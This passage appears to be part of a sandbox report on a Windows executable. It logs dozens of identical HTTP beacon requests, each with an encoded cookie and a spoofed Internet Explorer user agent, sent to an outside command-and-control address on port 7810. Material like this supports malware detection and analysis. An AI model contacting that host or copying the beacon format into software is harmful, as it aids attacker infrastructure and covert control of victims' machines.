Oct 7, 2024 22:02:48.788067102 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50096	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:50.509876966 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50097	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:52.239969015 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50098	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:53.963825941 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50099	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:55.645150900 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50100	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:57.348505020 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50101	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:59.410825014 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50102	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:01.490750074 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50103	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:03.364001989 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50104	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:05.083220959 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50105	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:06.803975105 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50106	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:09.477650881 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50107	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:11.161505938 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50108	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:12.895720005 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50109	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:14.584964991 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50110	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:16.319725990 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50111	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:20.442635059 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50112	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:22.157046080 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50113	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:23.849575996 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50114	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:25.551630020 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50115	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:27.241765976 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50116	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:31.365053892 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50117	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:33.051806927 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50118	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:35.036241055 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50119	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:36.776012897 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50120	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:38.489892960 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50121	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:40.176038027 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50122	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:41.914148092 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50123	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:43.614250898 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50124	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:45.908759117 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50125	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:47.733508110 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	50126	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:49.411884069 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	50127	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:51.247157097 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	50128	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:52.929528952 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	50129	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:54.615895987 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	50130	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
